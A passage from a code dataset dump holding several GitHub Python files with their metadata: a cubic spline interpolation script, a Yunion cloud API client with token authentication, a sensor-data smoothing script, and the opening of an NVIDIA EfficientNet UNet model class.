in range(1, size-1, 1):\r\n Li_1[i] = xdiff[i-1] / Li[i-1]\r\n Li[i] = sqrt(2*(xdiff[i-1]+xdiff[i]) - Li_1[i-1] * Li_1[i-1])\r\n Bi = 6*(ydiff[i]/xdiff[i] - ydiff[i-1]/xdiff[i-1])\r\n z[i] = (Bi - Li_1[i-1]*z[i-1])/Li[i]\r\n\r\n i = size - 1\r\n Li_1[i-1] = xdiff[-1] / Li[i-1]\r\n Li[i] = sqrt(2*xdiff[-1] - Li_1[i-1] * Li_1[i-1])\r\n Bi = 0.0\r\n z[i] = (Bi - Li_1[i-1]*z[i-1])/Li[i]\r\n\r\n\r\n i = size-1\r\n z[i] = z[i] / Li[i]\r\n for i in range(size-2, -1, -1):\r\n z[i] = (z[i] - Li_1[i-1]*z[i+1])/Li[i]\r\n\r\n index = x.searchsorted(x0)\r\n np.clip(index, 1, size-1, index)\r\n\r\n xi1, xi0 = x[index], x[index-1]\r\n yi1, yi0 = y[index], y[index-1]\r\n zi1, zi0 = z[index], z[index-1]\r\n hi1 = xi1 - xi0\r\n\r\n f0 = zi0/(6*hi1)*(xi1-x0)**3 + \\\r\n zi1/(6*hi1)*(x0-xi0)**3 + \\\r\n (yi1/hi1 - zi1*hi1/6)*(x0-xi0) + \\\r\n (yi0/hi1 - zi0*hi1/6)*(xi1-x0)\r\n return f0\r\n\r\nplt.figure(figsize = (12, 8))\r\nplt.scatter(x_points, y_points)\r\nplt.plot(x_points, y_points, 'bo')\r\nplt.plot(x_new, y_new)\r\nX_new = np.linspace(-12, 2.1, 201)\r\nplt.plot(x_new, cubic_interp1d(x_new, x_points, y_points))\r\nplt.show()\r\n", "repo_name": "kopczyn12/numerical-methods", "sub_path": "interpolation_methods/mn8.py", "file_name": "mn8.py", "file_ext": "py", "file_size_in_byte": 2779, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 6, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.asfarray", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.asfarray", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.any", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 74, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 76, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 83, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}]} +{"seq_id": "43238082118", "text": "import logging\nimport json\n\nfrom yunionclient.common import http\n\nfrom yunionclient.api import zones\nfrom yunionclient.api import keypairs\nfrom yunionclient.api import hosts\nfrom yunionclient.api import wires\nfrom yunionclient.api import hostwires\nfrom yunionclient.api import storages\nfrom yunionclient.api import hoststorages\n\nfrom yunionclient.api import networks\nfrom yunionclient.api import disks\nfrom yunionclient.api import guests\nfrom yunionclient.api import guestdisks\nfrom yunionclient.api import guestnetworks\nfrom yunionclient.api import groupnetworks\n\nfrom yunionclient.api import groupguests\n\nfrom yunionclient.api import flavors\n\nfrom yunionclient.api import usages\n\nfrom yunionclient.api import logs\n\nfrom yunionclient.api import images\n\nfrom yunionclient.api import vncproxy\n\nfrom yunionclient.api import sshrelay\n\nfrom yunionclient.api import quotas\n\nfrom yunionclient.api import secgroups\n\nfrom yunionclient.api import dnsrecords\n\nfrom yunionclient.api import baremetalagents\nfrom yunionclient.api import baremetals\nfrom yunionclient.api import baremetalnetworks\nfrom yunionclient.api import baremetalstorages\n\nfrom yunionclient.api import reservedips\n\nfrom yunionclient.api import scheduler\n\nfrom yunionclient.api.stats import RegionStatsManager\n\nfrom yunionclient.api.tenantinfo import TenantInfo, TenantInfoManager\n\nfrom yunionclient.api import users\nfrom yunionclient.api import tenants\nfrom yunionclient.api import projects\nfrom yunionclient.api import groups\nfrom yunionclient.api import roles\nfrom yunionclient.api import groupusers\n\nfrom yunionclient.api import ec2credentials\nfrom yunionclient.api import services\nfrom yunionclient.api import endpoints\nfrom yunionclient.api import schedtags\nfrom yunionclient.api import metadatas\nfrom yunionclient.api import loadbalancers\n\nlogger = logging.getLogger(__name__)\n\n\nclass Client(http.HTTPClient):\n \"\"\"Client for Yunion Cloud API\n \"\"\"\n\n def __init__(self, auth_url, username, password, domain_name,\n region=None, zone=None, endpoint_type='internalURL',\n timeout=600, insecure=False):\n \"\"\" Initialize a new client for the Images v1 API. \"\"\"\n super(Client, self).__init__(timeout, insecure)\n\n self.auth_url = auth_url\n self.username = username\n self.password = password\n self.domain_name = domain_name\n\n self.endpoint_type = endpoint_type\n\n self.set_region(region, zone)\n\n self.default_tenant = None\n self.tenants_info_manager = TenantInfoManager()\n\n self.keypairs = keypairs.KeypairManager(self)\n self.zones = zones.ZoneManager(self)\n self.hosts = hosts.HostManager(self)\n self.wires = wires.WireManager(self)\n self.storages = storages.StorageManager(self)\n\n self.hostwires = hostwires.HostwireManager(self)\n self.hoststorages = hoststorages.HoststorageManager(self)\n\n self.networks = networks.NetworkManager(self)\n self.disks = disks.DiskManager(self)\n\n self.flavors = flavors.FlavorManager(self)\n\n self.guests = guests.GuestManager(self)\n\n self.guestnetworks = guestnetworks.GuestnetworkManager(self)\n self.groupnetworks = groupnetworks.GroupnetworkManager(self)\n self.guestdisks = guestdisks.GuestdiskManager(self)\n\n self.groupguests = groupguests.GroupguestManager(self)\n\n self.usages = usages.UsageManager(self)\n\n self.images = images.ImageManager(self)\n\n self.vncproxy = vncproxy.VNCProxyManager(self)\n\n self.sshrelay = sshrelay.SSHRelayManager(self)\n\n self.logs = logs.LogManager(self)\n\n self.quotas = quotas.QuotaManager(self)\n\n self.scheduler = scheduler.SchedulerManager(self)\n\n self.users = users.UserManager(self)\n self.tenants = tenants.TenantManager(self)\n self.projects = projects.ProjectManager(self)\n self.groups = groups.GroupManager(self)\n self.roles = roles.RoleManager(self)\n self.groupusers = groupusers.GroupuserManager(self)\n\n self.ec2credentials = ec2credentials.EC2CredentialManager(self)\n self.services = services.ServiceManager(self)\n self.endpoints = endpoints.EndpointManager(self)\n\n self.secgroups = secgroups.SecuritygroupManager(self)\n\n self.dns = dnsrecords.DNSRecordManager(self)\n\n self.baremetalagents = baremetalagents.BaremetalAgentManager(self)\n self.baremetals = baremetals.BaremetalManager(self)\n self.baremetalnetworks = baremetalnetworks.BaremetalnetworkManager(self)\n self.baremetalstorages = baremetalstorages.BaremetalstorageManager(self)\n\n self.reservedips = reservedips.ReservedIPManager(self)\n\n self.schedtags = schedtags.SchedtagManager(self)\n self.schedtag_hosts = schedtags.SchedtagHostManager(self)\n\n self.region_stats = RegionStatsManager(self)\n self.metadatas = metadatas.MetadataManager(self)\n self.loadbalancers = loadbalancers.LoadbalancerManager(self)\n self.loadbalancerlisteners = loadbalancers.LoadbalancerListenerManager(self)\n self.loadbalancerlistenerrules = loadbalancers.LoadbalancerListenerRuleManager(self)\n self.loadbalancercertificates = loadbalancers.LoadbalancerCertificateManager(self)\n self.loadbalancerbackendgroups = loadbalancers.LoadbalancerBackendGroupManager(self)\n self.loadbalancerbackends = loadbalancers.LoadbalancerBackendManager(self)\n self.loadbalanceracls = loadbalancers.LoadbalancerAclManager(self)\n\n self.loadbalancerclusters = loadbalancers.LoadbalancerClusterManager(self)\n self.loadbalanceragents = loadbalancers.LoadbalancerAgentManager(self)\n\n def set_region(self, region, zone=None):\n self.region = region\n self.zone = zone\n\n def _authenticatev3(self, project_name=None, project_id=None):\n logging.info('authenticate %s %s' % (project_name, project_id))\n auth = {}\n user = {'name': self.username, 'password': self.password}\n if self.domain_name:\n user['domain'] = {'name': self.domain_name}\n else:\n user['domain'] = {'id': 'default'}\n auth['identity'] = {'methods': ['password'],\n 'password': {'user': user}}\n project = {}\n if project_name:\n project['name'] = project_name\n project['domain'] = {'id': 'default'}\n if project_id:\n project['id'] = project_id\n auth['scope'] = {'project': project}\n body = {'auth': auth}\n resp, body = self._json_request(self.auth_url, None,\n 'POST', '/auth/tokens', body=body)\n if 'token' in body:\n token_id = resp['x-subject-token']\n if 'project' in body['token']:\n self.default_tenant = TenantInfo(None, None)\n token = {'id': token_id,\n 'tenant': body['token']['project'],\n 'expires': body['token']['expires_at']}\n catalog = body['token']['catalog']\n user = body['token']['user']\n self.default_tenant.set_access_info(token, catalog, user)\n self.tenants_info_manager.add_tenant(self.default_tenant)\n else:\n self._fetch_tenants(token_id)\n return True\n else:\n raise Exception('Wrong return format %s' % json.dumps(body))\n\n def _authenticate(self, tenant_name=None, tenant_id=None):\n logging.info('authenticate %s %s' % (tenant_name, tenant_id))\n auth = {}\n auth['passwordCredentials'] = {'username': self.username,\n 'password': self.password}\n if tenant_id is not None and len(tenant_id) > 0:\n auth['tenantId'] = tenant_id\n elif tenant_name is not None and len(tenant_name) > 0:\n auth['tenantName'] = tenant_name\n body = {'auth': auth}\n resp, body = self._json_request(self.auth_url, None,\n 'POST', '/tokens', body=body)\n # print json.dumps(body, indent=4)\n if 'access' in body:\n token = body['access']['token']\n catalog = body['access']['serviceCatalog']\n user = body['access']['user']\n if 'tenant' in token:\n self.default_tenant = TenantInfo(None, None)\n # print 'Token:', token\n self.default_tenant.set_access_info(token, catalog, user)\n self.tenants_info_manager.add_tenant(self.default_tenant)\n else:\n self._fetch_tenants(token['id'])\n return True\n else:\n raise Exception('Wrong return format %s' % json.dumps(body))\n return False\n\n def _fetch_tenants(self, token):\n try:\n resp, body = self._json_request(self.auth_url, token,\n 'GET', '/tenants')\n if 'tenants' in body:\n for t in body['tenants']:\n self.tenants_info_manager.add_tenant(TenantInfo(t['id'],\n t['name']))\n return True\n except Exception as e:\n raise Exception('_fetch_tenants %s' % e)\n return False\n\n def get_tenants(self):\n self._authenticate(None, None)\n return self.tenants_info_manager.get_tenants()\n\n def set_project(self, project_name=None, project_id=None):\n return self.set_tenant(tenant_name=project_name, tenant_id=project_id)\n\n def set_tenant(self, tenant_name=None, tenant_id=None):\n tenant = self.tenants_info_manager.get_tenant(tenant_id=tenant_id,\n tenant_name=tenant_name)\n if tenant is None:\n return self._authenticatev3(project_name=tenant_name,\n project_id=tenant_id)\n else:\n self.default_tenant = tenant\n return True\n\n def get_default_tenant(self):\n if self.default_tenant is None:\n raise Exception('No tenant specified')\n # if self.default_tenant.expire_soon():\n # self._authenticate(tenant_name=self.default_tenant.get_name(),\n # tenant_id=self.default_tenant.get_id())\n return self.default_tenant\n\n def get_regions(self):\n t = self.get_default_tenant()\n if t is not None:\n return t.get_regions()\n else:\n return None\n\n def get_endpoint(self, service, admin_api=False, region=None, zone=None):\n t = self.get_default_tenant()\n if t is not None:\n if admin_api:\n ep_type = 'adminURL'\n else:\n ep_type = self.endpoint_type\n if region is None:\n region = self.region\n if zone is None:\n zone = self.zone\n return t.get_endpoint(region, service, ep_type, zone=zone)\n else:\n raise Exception('No tenant specified')\n\n def _wrapped_request(self, func, service, admin_api, method, url, **kwargs):\n t = self.get_default_tenant()\n if t is not None:\n ep = self.get_endpoint(service, admin_api)\n if ep is not None:\n ep = self._strip_version(ep)\n return func(ep, t.get_token(), method, url, **kwargs)\n else:\n raise Exception('NO valid endpoint found for %s' % service)\n else:\n raise Exception('No tenant specified')\n\n def json_request(self, service, admin_api, method, url, **kwargs):\n return self._wrapped_request(self._json_request, service, admin_api,\n method, url, **kwargs)\n\n def raw_request(self, service, admin_api, method, url, **kwargs):\n return self._wrapped_request(self._raw_request, service, admin_api,\n method, url, **kwargs)\n\n def get_urllib2_raw_request(self, service, admin_api, url, **kwargs):\n return self._wrapped_request(self._get_urllib2_raw_request, service,\n admin_api, 'GET', url, **kwargs)\n\n def from_file(self, filename):\n with open(filename, 'r') as f:\n desc = f.read()\n self.from_json(json.loads(desc))\n\n def from_json(self, desc):\n self.auth_url = desc['auth_url']\n self.username = desc['username']\n self.endpoint_type = desc['endpoint_type']\n self.set_region(desc['region'], desc.get('zone', None))\n self.tenants_info_manager = TenantInfoManager()\n self.tenants_info_manager.from_json(desc['tenants'])\n if 'default_tenant_id' in desc:\n self.set_tenant(tenant_id=desc['default_tenant_id'])\n\n def to_file(self, filename):\n with open(filename, 'w') as f:\n desc = self.to_json()\n f.write(json.dumps(desc))\n\n def to_json(self):\n desc = {}\n desc['tenants'] = self.tenants_info_manager.to_json()\n desc['username'] = self.username\n desc['auth_url'] = self.auth_url\n desc['region'] = self.region\n if self.zone:\n desc['zone'] = self.zone\n desc['endpoint_type'] = self.endpoint_type\n if self.default_tenant is not None:\n desc['default_tenant_id'] = self.default_tenant.get_id()\n return desc\n\n def is_admin(self):\n tenant = self.get_default_tenant()\n if tenant is not None:\n return tenant.is_admin()\n return False\n\n def is_system_admin(self):\n tenant = self.get_default_tenant()\n if tenant is not None:\n return tenant.is_system_admin()\n return False\n\n", "repo_name": "swordqiu/python_yunionsdk", "sub_path": "yunionclient/api/client.py", "file_name": "client.py", "file_ext": "py", "file_size_in_byte": 13847, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 68, "usage_type": "call"}, {"api_name": "yunionclient.common.http.HTTPClient", "line_number": 71, "usage_type": "attribute"}, {"api_name": "yunionclient.common.http", "line_number": 71, "usage_type": "name"}, {"api_name": "yunionclient.api.tenantinfo.TenantInfoManager", "line_number": 91, "usage_type": "call"}, {"api_name": "yunionclient.api.keypairs.KeypairManager", "line_number": 93, "usage_type": "call"}, {"api_name": "yunionclient.api.keypairs", "line_number": 93, "usage_type": "name"}, {"api_name": "yunionclient.api.zones.ZoneManager", "line_number": 94, "usage_type": "call"}, {"api_name": "yunionclient.api.zones", "line_number": 94, "usage_type": "name"}, {"api_name": "yunionclient.api.hosts.HostManager", "line_number": 95, "usage_type": "call"}, {"api_name": "yunionclient.api.hosts", "line_number": 95, "usage_type": "name"}, {"api_name": "yunionclient.api.wires.WireManager", "line_number": 96, "usage_type": "call"}, {"api_name": "yunionclient.api.wires", "line_number": 96, "usage_type": "name"}, {"api_name": "yunionclient.api.storages.StorageManager", "line_number": 97, "usage_type": "call"}, {"api_name": "yunionclient.api.storages", "line_number": 97, "usage_type": "name"}, {"api_name": "yunionclient.api.hostwires.HostwireManager", "line_number": 99, "usage_type": "call"}, {"api_name": "yunionclient.api.hostwires", "line_number": 99, "usage_type": "name"}, {"api_name": "yunionclient.api.hoststorages.HoststorageManager", "line_number": 100, "usage_type": "call"}, {"api_name": "yunionclient.api.hoststorages", "line_number": 100, "usage_type": "name"}, {"api_name": "yunionclient.api.networks.NetworkManager", "line_number": 102, "usage_type": "call"}, {"api_name": "yunionclient.api.networks", "line_number": 102, "usage_type": "name"}, {"api_name": "yunionclient.api.disks.DiskManager", "line_number": 103, "usage_type": "call"}, {"api_name": "yunionclient.api.disks", "line_number": 103, "usage_type": "name"}, {"api_name": "yunionclient.api.flavors.FlavorManager", "line_number": 105, "usage_type": "call"}, {"api_name": "yunionclient.api.flavors", "line_number": 105, "usage_type": "name"}, {"api_name": "yunionclient.api.guests.GuestManager", "line_number": 107, "usage_type": "call"}, {"api_name": "yunionclient.api.guests", "line_number": 107, "usage_type": "name"}, {"api_name": "yunionclient.api.guestnetworks.GuestnetworkManager", "line_number": 109, "usage_type": "call"}, {"api_name": "yunionclient.api.guestnetworks", "line_number": 109, "usage_type": "name"}, {"api_name": "yunionclient.api.groupnetworks.GroupnetworkManager", "line_number": 110, "usage_type": "call"}, {"api_name": "yunionclient.api.groupnetworks", "line_number": 110, "usage_type": "name"}, {"api_name": "yunionclient.api.guestdisks.GuestdiskManager", "line_number": 111, "usage_type": "call"}, {"api_name": "yunionclient.api.guestdisks", "line_number": 111, "usage_type": "name"}, {"api_name": "yunionclient.api.groupguests.GroupguestManager", "line_number": 113, "usage_type": "call"}, {"api_name": "yunionclient.api.groupguests", "line_number": 113, "usage_type": "name"}, {"api_name": "yunionclient.api.usages.UsageManager", "line_number": 115, "usage_type": "call"}, {"api_name": "yunionclient.api.usages", "line_number": 115, "usage_type": "name"}, {"api_name": "yunionclient.api.images.ImageManager", "line_number": 117, "usage_type": "call"}, {"api_name": "yunionclient.api.images", "line_number": 117, "usage_type": "name"}, {"api_name": "yunionclient.api.vncproxy.VNCProxyManager", "line_number": 119, "usage_type": "call"}, {"api_name": "yunionclient.api.vncproxy", "line_number": 119, "usage_type": "name"}, {"api_name": "yunionclient.api.sshrelay.SSHRelayManager", "line_number": 121, "usage_type": "call"}, {"api_name": "yunionclient.api.sshrelay", "line_number": 121, "usage_type": "name"}, {"api_name": "yunionclient.api.logs.LogManager", "line_number": 123, "usage_type": "call"}, {"api_name": "yunionclient.api.logs", "line_number": 123, "usage_type": "name"}, {"api_name": "yunionclient.api.quotas.QuotaManager", "line_number": 125, "usage_type": "call"}, {"api_name": "yunionclient.api.quotas", "line_number": 125, "usage_type": "name"}, {"api_name": "yunionclient.api.scheduler.SchedulerManager", "line_number": 127, "usage_type": "call"}, {"api_name": "yunionclient.api.scheduler", "line_number": 127, "usage_type": "name"}, {"api_name": "yunionclient.api.users.UserManager", "line_number": 129, "usage_type": "call"}, {"api_name": "yunionclient.api.users", "line_number": 129, "usage_type": "name"}, {"api_name": "yunionclient.api.tenants.TenantManager", "line_number": 130, "usage_type": "call"}, {"api_name": "yunionclient.api.tenants", "line_number": 130, "usage_type": "name"}, {"api_name": "yunionclient.api.projects.ProjectManager", "line_number": 131, "usage_type": "call"}, {"api_name": "yunionclient.api.projects", "line_number": 131, "usage_type": "name"}, {"api_name": "yunionclient.api.groups.GroupManager", "line_number": 132, "usage_type": "call"}, {"api_name": "yunionclient.api.groups", "line_number": 132, "usage_type": "name"}, {"api_name": "yunionclient.api.roles.RoleManager", "line_number": 133, "usage_type": "call"}, {"api_name": "yunionclient.api.roles", "line_number": 133, "usage_type": "name"}, {"api_name": "yunionclient.api.groupusers.GroupuserManager", "line_number": 134, "usage_type": "call"}, {"api_name": "yunionclient.api.groupusers", "line_number": 134, "usage_type": "name"}, {"api_name": "yunionclient.api.ec2credentials.EC2CredentialManager", "line_number": 136, "usage_type": "call"}, {"api_name": "yunionclient.api.ec2credentials", "line_number": 136, "usage_type": "name"}, {"api_name": "yunionclient.api.services.ServiceManager", "line_number": 137, "usage_type": "call"}, {"api_name": "yunionclient.api.services", "line_number": 137, "usage_type": "name"}, {"api_name": "yunionclient.api.endpoints.EndpointManager", "line_number": 138, "usage_type": "call"}, {"api_name": "yunionclient.api.endpoints", "line_number": 138, "usage_type": "name"}, {"api_name": "yunionclient.api.secgroups.SecuritygroupManager", "line_number": 140, "usage_type": "call"}, {"api_name": "yunionclient.api.secgroups", "line_number": 140, "usage_type": "name"}, {"api_name": "yunionclient.api.dnsrecords.DNSRecordManager", "line_number": 142, "usage_type": "call"}, {"api_name": "yunionclient.api.dnsrecords", "line_number": 142, "usage_type": "name"}, {"api_name": "yunionclient.api.baremetalagents.BaremetalAgentManager", "line_number": 144, "usage_type": "call"}, {"api_name": "yunionclient.api.baremetalagents", "line_number": 144, "usage_type": "name"}, {"api_name": "yunionclient.api.baremetals.BaremetalManager", "line_number": 145, "usage_type": "call"}, {"api_name": "yunionclient.api.baremetals", "line_number": 145, "usage_type": "name"}, {"api_name": "yunionclient.api.baremetalnetworks.BaremetalnetworkManager", "line_number": 146, "usage_type": "call"}, {"api_name": "yunionclient.api.baremetalnetworks", "line_number": 146, "usage_type": "name"}, {"api_name": "yunionclient.api.baremetalstorages.BaremetalstorageManager", "line_number": 147, "usage_type": "call"}, {"api_name": "yunionclient.api.baremetalstorages", "line_number": 147, "usage_type": "name"}, {"api_name": "yunionclient.api.reservedips.ReservedIPManager", "line_number": 149, "usage_type": "call"}, {"api_name": "yunionclient.api.reservedips", "line_number": 149, "usage_type": "name"}, {"api_name": "yunionclient.api.schedtags.SchedtagManager", "line_number": 151, "usage_type": "call"}, {"api_name": "yunionclient.api.schedtags", "line_number": 151, "usage_type": "name"}, {"api_name": "yunionclient.api.schedtags.SchedtagHostManager", "line_number": 152, "usage_type": "call"}, {"api_name": "yunionclient.api.schedtags", "line_number": 152, "usage_type": "name"}, {"api_name": "yunionclient.api.stats.RegionStatsManager", "line_number": 154, "usage_type": "call"}, {"api_name": "yunionclient.api.metadatas.MetadataManager", "line_number": 155, "usage_type": "call"}, {"api_name": "yunionclient.api.metadatas", "line_number": 155, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerManager", "line_number": 156, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 156, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerListenerManager", "line_number": 157, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 157, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerListenerRuleManager", "line_number": 158, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 158, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerCertificateManager", "line_number": 159, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 159, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerBackendGroupManager", "line_number": 160, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 160, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerBackendManager", "line_number": 161, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 161, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerAclManager", "line_number": 162, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 162, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerClusterManager", "line_number": 164, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 164, "usage_type": "name"}, {"api_name": "yunionclient.api.loadbalancers.LoadbalancerAgentManager", "line_number": 165, "usage_type": "call"}, {"api_name": "yunionclient.api.loadbalancers", "line_number": 165, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 172, "usage_type": "call"}, {"api_name": "yunionclient.api.tenantinfo.TenantInfo", "line_number": 194, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 206, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 209, "usage_type": "call"}, {"api_name": "yunionclient.api.tenantinfo.TenantInfo", "line_number": 226, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 234, "usage_type": "call"}, {"api_name": "yunionclient.api.tenantinfo.TenantInfo", "line_number": 243, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 324, "usage_type": "call"}, {"api_name": "yunionclient.api.tenantinfo.TenantInfoManager", "line_number": 331, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 339, "usage_type": "call"}]} +{"seq_id": "4852226072", "text": "#!/bin/python\n# cleans sensor data\n# christopher pietsch\nimport sys\nfrom scipy.ndimage import gaussian_filter1d\nimport numpy as np\n \n_i=sys.argv[1]\n_o=sys.argv[2]\n \nf = open(_i, \"r\")\nrl=f.readlines()\n \na=[]\nfor l in rl:\n i = l.split(', ')[1:]\n x=float(i[0])\n y=float(i[1].rstrip('\\n'))\n a.append((x, y))\n \nna=np.array(a)\n \nx, y = na.T\nt = np.linspace(0, 1, len(x))\nt2 = np.linspace(0, 1, 100)\n \nx2 = np.interp(t2, t, x)\ny2 = np.interp(t2, t, y)\nsigma = 10\nx3 = gaussian_filter1d(x2, sigma)\ny3 = gaussian_filter1d(y2, sigma)\n \nx4 = np.interp(t, t2, x3)\ny4 = np.interp(t, t2, y3)\n \nfo=open(_o, 'a')\nfor p in range(len(x3)):\n fo.write(str(x3[p])+\", \"+str(y3[p])+\"\\n\")\n \nfo.close()", "repo_name": "cpietsch/deepsweep", "sub_path": "preprocess/clean.py", "file_name": "clean.py", "file_ext": "py", "file_size_in_byte": 694, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.argv", "line_number": 8, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 9, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 28, "usage_type": "call"}, {"api_name": "scipy.ndimage.gaussian_filter1d", "line_number": 30, "usage_type": "call"}, {"api_name": "scipy.ndimage.gaussian_filter1d", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.interp", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "20615300481", "text": "# Copyright (c) 2023, NVIDIA CORPORATION. All rights reserved.\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\r\n\"\"\"EfficientNet Unet model class that takes care of constructing and validating a model.\"\"\"\r\n\r\nimport logging\r\nimport keras\r\nfrom keras.models import Model\r\n\r\nfrom nvidia_tao_tf1.core.templates.efficientnet import EfficientNetB0\r\nfrom nvidia_tao_tf1.cv.unet.model.layers import Conv2DTranspose_block\r\nfrom nvidia_tao_tf1.cv.unet.model.unet_model import UnetModel\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\n\r\neff_dict = {'efficientnet_b0': ('block1a_project_bn', 'block2a_project_bn',\r\n 'block3a_project_bn', 'block5a_project_bn')}\r\n\r\n\r\nclass EfficientUnet(UnetModel):\r\n \"\"\"Efficientnet Unet class.\"\"\"\r\n\r\n def __init__(self, *args, **kwargs):\r\n \"\"\"Init function.\r\n\r\n Args:\r\n num_layers (int): Number of layers for scalable feature extractors.\r\n use_pooling (bool): Whether to add pooling layers to the feature extractor.\r\n use_batch_norm (bool): Whether to add batch norm layers.\r\n dropout_rate (float): Fraction of the input units to drop. 0.0 means dropout is\r\n not used.\r\n target_class_names (list): A list of target class names.\r\n freeze_pretrained_layers (bool): Prevent updates to pretrained layers' parameters.\r\n allow_loaded_model_modification (bool): Allow loaded model modification.\r\n template (str): Model template to use for feature extractor.\r\n freeze_bn (bool): The boolean to freeze BN or not.\r\n load_graph (bool): The boolean to laod graph for phase 1.\r\n \"\"\"\r\n super(EfficientUnet, self).__init__(*args, **kwargs)\r\n\r\n def construct_decoder_model(self, encoder_model, export=False):\r\n \"\"\"Construct the decoder for Unet with EfficientNet as backbone.\r\n\r\n Args:\r\n encoder_model (keras.model): keras model type.\r\n export (bool): Set the inference flag to build the\r\n inference model with softmax.\r\n Returns:\r\n model (keras.model): The entire Unet model with encoder and decoder.\r\n \"\"\"\r\n B1, B2, B3, B4 = eff_dict[self.template]\r\n S2 = encoder_model.get_layer(B1).output\r\n S3 = encoder_model.get_layer(B2).output\r\n S4 = encoder_model.get_layer(B3).output\r\n S5 = encoder_model.get_layer(B4).output\r\n skips = [S2, S3, S4, S5]\r\n out = encoder_model.output\r\n for filter_tmp in [512, 256, 128, 64, 32]:\r\n if skips:\r\n skip_to_use = skips.pop()\r\n else:\r\n skip_to_use = None\r\n out = Conv2DTranspose_block(input_tensor=out, filters=filter_tmp,\r\n initializer=\"glorot_uniform\",\r\n skip=skip_to_use,\r\n use_batchnorm=self.use_batch_norm,\r\n freeze_bn=self.freeze_bn)\r\n\r\n out = keras.layers.Conv2D(self.num_target_classes, (1, 1), padding='same',\r\n data_format=\"channels_first\")(out)\r\n if export:\r\n logger.debug(\"Building model for export\")\r\n out = self.get_activation_for_export(out)\r\n\r\n model_unet = Model(inputs=encoder_model.input, outputs=out)\r\n return model_unet\r\n\r\n def get_base_model(self, args, kwargs):\r\n 